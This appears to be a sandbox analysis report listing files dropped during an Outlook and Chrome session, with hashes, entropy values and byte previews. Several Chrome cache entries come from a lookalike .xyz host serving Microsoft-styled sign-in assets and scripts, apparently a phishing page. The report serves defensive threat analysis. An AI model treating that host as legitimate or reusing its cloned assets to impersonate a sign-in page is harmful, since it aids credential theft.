                                          Reputation:unknown
                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:modified
                                          Size (bytes):30
                                          Entropy (8bit):1.2389205950315936
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:26C02BF8E3F9B65C201E164F96CBD48D
                                          SHA1:9A770E3473323F2C1C9F8A25F030BBCAA462DFA2
                                          SHA-256:7E12FEFD7E3232DD74B3B51FD37AF4E4A0983E62BDA07B17CB07403BD3DD23A5
                                          SHA-512:E57001D0F1C250DD45E63B7798A3E9D3D068762DE6373B895C9C1F30B1CD97ED852A57FB624C7C5E19BA4A39CCF9C4409137FF3870D3DB6675CF6E12091FF9E8
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..............................

                                          C:\Users\user\AppData\Roaming\Microsoft\Outlook\NoEmail.srs

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:Composite Document File V2 Document, Cannot read section info
                                          Category:dropped
                                          Size (bytes):16384
                                          Entropy (8bit):0.6708622411103311
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8C5B387838B50943DA666775822BE2C6
                                          SHA1:7C49B71D1D10FC26DB032C3A4111E4AE350B7DE6
                                          SHA-256:4CCFB34C4545AE31AADE251686E98D058D0AD15F2832436B17146A98299B728A
                                          SHA-512:C0A8533126B2036C07EB75D4E3278846D16653DB2EDDE0D809BD44D0C1F5243B60B032BE5676A2F326EDFB002F7E23EDFCF0DD290BFE0A5B450CAACB24A0DDF2
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):18
                                          Entropy (8bit):2.725480556997868
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:A5E51FDFAF429614FB5218AB559D299A
                                          SHA1:262EC76760BB9A83BCFF955C985E70820DF567AE
                                          SHA-256:3E82E9F60CE38815C28B0E5323268BDA212A84C3A9C7ACCC731360F998DF0240
                                          SHA-512:9B68F1C04BDE0024CECFC05A37932368CE2F09BD96C72AB0442E16C8CF5456ED9BB995901095AC1BBDF645255014A5E43AADEE475564F01CA6BE3889C96C29C9
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..t.o.r.r.e.s.....

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 2 17:22:03 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2677
                                          Entropy (8bit):3.9982172340025826
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:027F950843D8C763352ADBB1984A66A6
                                          SHA1:3AE67BC16421E2067A0415F5B624D56A988CBB7B
                                          SHA-256:EE86DE163D01C0660807AC24AF4522ED8B89521A626E87C93034651B2C8F36AA
                                          SHA-512:FE05B5D3065282BAC90A89EAEC51F5E853AACD8B625803BB12F7FB31004B1555DAF54324806A9611B8FE4D2E6C5B0C95F475314069DF2005160809A5C815207E
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,..............y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 2 17:22:03 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2679
                                          Entropy (8bit):4.013815907262369
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:22ABFD3CC2083881DD4063C7187FDBED
                                          SHA1:CAF028F947393F06923E2897D69272EA8868E90A
                                          SHA-256:7B412E62117332F81BE0C6489FBE7D5F62113B7208016F5A10B25B2363BCB162
                                          SHA-512:277081A7A2C41028EFDA2C0836653395E13031297D01BDE81DDFEC7BAAB3283904DAFC21EF6AF1815F0C2367EE2847174982FE270D8F93980ECFD640F359694F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,................y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2693
                                          Entropy (8bit):4.019243435044295
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:870CACC3733A2FF6B3CAB8F61998FBCF
                                          SHA1:51A7D6D8A343427D47DD092A3A637BFFB7C3F0D8
                                          SHA-256:306CF5307078FDB67FFC1648798F6D7FA6658D6F583B5FB89166A64960F7886D
                                          SHA-512:0B1F01453FC205C243E6FC656F790B2A3908B9CE8224B871737C94D5C82ABE00E469ED4881DA2A31A68B25DBB92FEA3900464B0169D1CF03C55B5BF92B6EA5AD
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 2 17:22:03 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2681
                                          Entropy (8bit):4.012880403553417
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C9B5184099D150B2CF745FD8E2FE2B1E
                                          SHA1:F53241B8D230605A59142FBCBCCDCB38C2AB7265
                                          SHA-256:FF18DFD8412DFBB37DE858ABFB3F61F0B2167A4CCCB324C09E89E7D2909354C1
                                          SHA-512:E03383E7A9297A0AE63EAE364D3A77758E369FD38E2E1ED0FEB3A188E5BC9AAF710B2D97D601C1C9EEE3BA7060A91A3B286D5D96565C3BD1BD2734FB352705F2
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,...._...........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 2 17:22:03 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2681
                                          Entropy (8bit):4.001715752222511
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:DB9F695A4FE7E007E771C3687B20B29C
                                          SHA1:27313DC84DA22C7BE8C3D19280FB290D9393455F
                                          SHA-256:B2C51972AC70CD278A16CBE2BFE61ADDD4E027EE587B8ACB91EFDA39B848F364
                                          SHA-512:C15888805182CD13B2B4DBBE6A30401D41154B81DDB79BF3F294F39C214BE8B81026EA65100C3B8A3D5A8AC069DA5C47B4B4ADAE32922CB1B19891055895D5D1
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,................y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jul 2 17:22:03 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2683
                                          Entropy (8bit):4.016008650640294
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6538730929B573040CCE8E14DC3CB319
                                          SHA1:B9DB457F4573A6209D006D59E71DA0BDE80569BC
                                          SHA-256:3114D1ACC8F2CAFC53706A0DF3BFE8CF6E90993C226430486AB384F9458D7CCE
                                          SHA-512:5DD5280DFF5F71105267894A1B58DC31AE04FCCF1F4A549C7538C089CAA42A3BDF4F1D271E112EB22B39E6E46AC8D6E1B470426D4C470BF0BCDDC4D76FCA56E1
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,...............y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                          C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:Microsoft Outlook email folder (>=2003)
                                          Category:dropped
                                          Size (bytes):271360
                                          Entropy (8bit):1.5030584546257866
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:25EF104F2E3983B2E519C3131563119D
                                          SHA1:E894A217D2E9EA003FFC524EF4B070905DD077AE
                                          SHA-256:AD8949151B8C09BB2BEF97955ECF113274B7EF9869C15EE6D9B94D2E9CEFB8D7
                                          SHA-512:605D57B58694DF2DA0103FA2D397B760F971755E0BBD8E723F748CC23F614B8D92B5ABF40DBF3B5F5487D194E3F298073729A2FDAD31471A8C7BB5AE755C2003
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:!BDN....SM......\..."...................\................@...........@...@...................................@...........................................................................$.......D......@D.......................................r..................................................................................................................................................................................................................................................................................H........)..Eh.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):131072
                                          Entropy (8bit):0.9645168455599279
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:EC868555E4160A2DA1A8BDE780F899FB
                                          SHA1:381503C6ABE2D2251292680254D40C7E4338F4F5
                                          SHA-256:18A7794BD599230AEC805DE777E4AD9A47949EB257E89AC9A68931332B0ECFD4
                                          SHA-512:0D8F9768E5942B4435AAF353FC22F81D7B6464DAB73B2F78CD44F89005103CD762BD1F63ED05F763C2504E8FD2ACCA9573D34347C8F738608C55F24DC681FCDD
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:...A0...N.......|...*..........D............#.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D..........0...O.......|...*..........B............#.........................................................................................................................................................................................................................................................................................................................................................................................................

                                          Chrome Cache Entry: 107

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):46419
                                          Entropy (8bit):4.76412061471262
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:576F1B10946126A427239A4584BCA912
                                          SHA1:17BEBB743334CF2D1E239AD0AFF472D1DE57AD45
                                          SHA-256:7380443A0DC6728004EE12557DB6C2E44540D8801C4D4BFC6A70F31F6E183287
                                          SHA-512:D19622ACA92CF780EDCF221E23F09AE33CE34FD7F0899F44B142BAA7BE534F8D34DD868F13AE3C5E91996AF31E776ACC1B628AD4A0FDE587C7FBC81FEBB51F58
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/js/Webtrends.js
                                          Preview:// WebTrends SmartSource Data Collector Tag..// Version: 8.6.2..// MS Version: 3.2.5..// Tag Builder Version: 3.0..// Created: 04/01/2011..function WebTrends() {.. var that = this;.. if (typeof (gDcsId) != "undefined" && gDcsId) this.dcsid = gDcsId;.. else this.dcsid = "not_a_valid_dcsid";.. if (typeof (gDomain) != "undefined" && gDomain) this.domain = gDomain;.. else this.domain = "m.webtrends.com";.. if (typeof (gTimeZone) != "undefined" && gTimeZone) this.timezone = gTimeZone;.. else this.timezone = -8;.. if (typeof (gFpcDom) != "undefined" && gFpcDom) this.fpcdom = gFpcDom;.. else {.. if (/007ec667-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz$/.test(window.location.hostname)) {.. this.fpcdom = ".microsoft.com";.. } else {.. this.fpcdom = window.location.hostname;.. }.. }.. if (typeof (gOffsite) != "undefined" && gOffsite).. if (gOffsite == true || gOffsite == "true") this.fpcdom = "";.. this.na

                                          Chrome Cache Entry: 108

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):12388
                                          Entropy (8bit):4.879297491400776
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:432C0225D4F996FA527B1DDA37FAF9B1
                                          SHA1:000B0E2D9E8E70B56FCC4DD5CDE19B6B6DA2CBE4
                                          SHA-256:E7A2F12C0F145FA465B669F22F47FA9D7C43B6F67D2629FFE92F155C2FB009BF
                                          SHA-512:F857E83AEC665A71C447CBF4ACC431E38B5DE3875EE673C4A358A793459FBD93E0E0EADF20F435CE5043CF324909D5EC9456208486622BAB789DF7A37EE7302C
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/css/Style.css?v=1342177280
                                          Preview:* {.. line-break: strict..}....body,..input,..select,..textarea,..button,..legend {.. font-weight: normal;.. font-family: "Segoe UI-Regular-final", "Segoe UI", Segoe, Tahoma, Helvetica, Arial, Sans-Serif;.. font-size: 12px;.. line-height: 19px;.. letter-spacing: .01em;.. color: #666666..}....span.requiredstar {.. font-weight: normal;.. font-family: "Segoe UI-Regular-final", "Segoe UI", Segoe, Tahoma, Helvetica, Arial, Sans-Serif;.. font-size: 12px;.. color: #a80f22..}....h1,..h2,..h3,..h4,..h5,..h6 {.. font-weight: normal;.. font-family: "SegoeUI-Light-final", "Segoe UI Light", "Segoe UI", Segoe, Tahoma, Helvetica, Arial, Sans-Serif;.. color: #333333;.. margin: 0 0 0 0;.. cursor: default..}....h1 {.. font-size: 32px;.. line-height: normal;.. letter-spacing: -.01em;.. padding-left: 0px;.. padding-right: 0px..}....h2 {.. font-size: 22px;.. line-height: normal;.. letter-spacing: -.01em..}....h3 {.. font-size: 13px;

                                          Chrome Cache Entry: 109

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):1561
                                          Entropy (8bit):7.762338770217686
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8DC34013E911C5F68FC2BCA0400CB06F
                                          SHA1:16BAFA91AF100D65C4945F04E0C6E1643B98CF00
                                          SHA-256:795029D360C3D16233FCE96F1BFF13C261535C0885FAE806CFF766F32D96BCEE
                                          SHA-512:83ACA42A30BFD629BC1E88D3ED154475E7949C1B154D19E6C9EF1DE825BA7967C0B6DA9EE79E7B420668242CCE5931DF344C97278A254F0A72C3D09EABED6051
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.PNG........IHDR...<...<.....:..r....sBIT....|.d.....pHYs...........S.....tEXtCreation Time.05/06/16...o....tEXtSoftware.Adobe Fireworks CS6.....qIDATh..=l.E.....H..H*.|... ...&.D..).@....&...N....)_.E ...(.p...p(H...Ht... ..0............i.}s.....{`ss....;.......:...u..."....Az.r.%.9.|....wU.j...o....N4...~....g.u.=`.;..9.7.%....Ad#......9....~7.....&.a........`]x^D....&,"..kv.l..K.S+!....#{.xm.;..%.+F<.\..#...bN...2...\.".I..U]..#.dWy$."r.2;Z...w)oD..H..u..M.'.k70.<4aG..`'~......k31W.2!Ue.A"..j....X..C...dNUd.... .j.|c."..../..P.MXD......C`>7Y.K...n.....U..#..^4....Uu...Q.);.`9q.53..n.@.......A6.E,6.-d; ........nl.>..."..N7..9\6.....p^a..4aG...3...gUu#..j...2............f.....^.)...Udo'&..G.C.Z...L).....".t...pCD..n..a.....E....F...o.k.Y+b...[...gT..... ...]....V..m.!\..SCwh8w..J^.3N........\.W.....3.....lP.Da........-..........@_...i......r..%..)E.Q...3..M..o.$...`...".......-/EHIDZ.q.MC.......D.Q..".. ..#...................1...p.x?dKP.=...{u\.

                                          Chrome Cache Entry: 111

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, original size modulo 2^32 1378
                                          Category:downloaded
                                          Size (bytes):628
                                          Entropy (8bit):7.659657630123852
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:144602B9BCB69A170EE0F9E900C107F7
                                          SHA1:ABDAC4E49652003158DD7DC561C3EC7878CEBDAF
                                          SHA-256:B5099539DA34B1482C022BBC78270BF471CF9349EF84BB34CA7A02B63515FA9E
                                          SHA-512:BF80EB1F4E3AFC5568320FE865C4C1B9BE44C1363B36B82549D5344486F157905B4C6573D5CC8418BC311CCE5BBB7C93208FDD68E1A2F72CAA311D786235AA6F
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/images/picker_account_aad_a8332c62695d74843a11daf39a74e552.svg
                                          Preview:..........m.Mo.0.....]%F..6...rX.;..&i..].&HZ...#%...B..4.W$.....>....v8...f....g.O/.3k....ms.o....m...a8.......u..4>.]....r~8...%.....x.m.y].....u.>..7....l.]....i..fC.[O..z.)..r..........g!(.+....4.P9.0@.......R.......^q.I[..7.....Q;...6.N....a.d.%....:...6FE.}.......}s.`LV..Q.U. 8..}..y.&..I..a.\.8%..kgoo.Q6...>.5.8..!.....".t9].v.B) `.G6.V.E\..AJQU.7...J.oS.*........*.*@......l.....{.r..KP@......9YD..U......&..:..d......+/...(..:.S_...S......n..z.a...,.,&VB......eJR)...R.H3])>....9O.........KDi.O..#...-?D.1*..N.p....h.#.Z.[/..!.h..$..S..Phdqd....}.....E>g..q5..J.T......u.....i.b...

                                          Chrome Cache Entry: 112

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 338 x 72, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):4020
                                          Entropy (8bit):7.929907559552797
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:36AFB641BECFAD75FED5F4E6E8C39268
                                          SHA1:2495652F017B7A06D796AFE9C4A06ECD54F9CCFE
                                          SHA-256:5C2192A3932CB78B431A1AC0F3F3D73414A31C63D5CB279F2687E58C72694200
                                          SHA-512:08C27020CF80A181B941EE144090FFBDD12ED34BA8CBEC037ACECE63F850FF8A69BE6DDB0EC24F7141C46F27779ED59AF84A55FB367C1B6F8893B444F44C5AF5
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.PNG........IHDR...R...H.......}.....pHYs..!8..!8.E.1`....sRGB.........gAMA......a....IIDATx...r....[ZZ..V.'0......].......z....M..U.%........C.....}...s...mIV.O5...... ...U.Hq@b......Y..../)..hy.._S......KzK...O\5EQ...(....B.(......(J *...(...*....B.(......(J *...(...*....B.(..H..EQ.C...V...7.//...~...?.....h4:.@TH.E....}........k.v....L./.@TH...pGN.;.....'.(s...k.......4GTH...'O.~...g[..o.."....l..>.G...;..~...&.....d..u.^F.........M.h.....>.}>..........[......E.b..?.u..{.B........M._.iAh.>~.<*S...=.@`e..e....R....._ViA.E....R.@...@..vm.'Ei.v..\>QD..e..R......;o.p{......./^d..TH;.,F>..6...1?..E.p.}..J.p...XD.........7*.^b..../.w...........n0.+R.V).J.a..^.X.S..B(..W+++..W. ..e%"Z.[.{,....JQ.iG`....(5..e..`u.*.=.)J...........C.!.@..;$.i.F...W.[....#............k.(J.z....`.dB..)..-H...R.H..O.#V..%......W.4>.'..aJ9.2Q..+.R..id`.x..1.. .../.(J%..>2d.QJ..7.|.S`..10>..}.M#.....4......<f}..OWO..m.;C[;u.|P!......L...S.Egr.....3.k.......i.........O...

                                          Chrome Cache Entry: 113

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):1498
                                          Entropy (8bit):4.81759827491068
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:11FE4E6509513DB245F1F97E37C5D3AB
                                          SHA1:05322C35B6BFAE84CE8C626BD7B1F8C4A6F15A6D
                                          SHA-256:78D437B40A85299F96ED9D02E35F23FD3D3EF63D844D8D2523A15516F7E1D09C
                                          SHA-512:E8A7C3B06C54B671FF6772D6A360DD0B4A65888B4DBD32AE04D14E4971343A71E1B4EC1E58BD45898744A1B0DF4EDE24141FF47E2C0393E18AACFC97E6F10D76
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/css/ltrStyle.css?v=1342177280
